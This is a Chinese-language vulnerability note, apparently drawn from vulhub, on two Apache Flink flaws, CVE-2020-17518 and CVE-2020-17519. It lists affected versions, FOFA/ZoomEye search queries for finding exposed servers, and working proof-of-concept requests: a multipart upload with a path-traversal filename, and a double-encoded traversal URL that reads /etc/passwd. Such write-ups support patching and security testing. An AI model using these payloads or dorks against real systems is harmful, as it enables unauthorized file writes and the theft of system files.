Apache Flink CVE-2020-17518与CVE-2020-17519
参考连接:vulhub
Apache Flink简介
Apache Flink是一个分布式流批一体化的开源平台。Flink的核心是一个提供数据分发、通信以及自动容错的流计算引擎。Flink在流计算之上构建批处理,并且原生的支持迭代计算、内存管理以及程序优化。官方称之为Stateful Computations over Data Streams
,即数据流上有状态计算。官方对Flink的详细介绍What is Apache Flink。
CVE-2020-17518
漏洞描述:
Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。
影响版本:
1.5.1-1.11.2
安全版本:
Flink 1.11.3或Flink 1.12.0
相关搜索:
fofa:app=“APACHE-Flink”
钟馗之眼:app:“Apache Flink”
漏洞验证:
POST /jars/upload HTTP/1.1
Host: x.x.x.x:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
验证结果:
上传成功,通过cve-2020-17519检测:
CVE-2020-17519
漏洞描述:
Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
影响版本:
1.11.0~1.11.2
安全版本:
Flink 1.11.3或Flink 1.12.0
相关搜索:
fofa:app=“APACHE-Flink”
钟馗之眼:app:“Apache Flink”
漏洞验证:
http://IP/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
验证结果: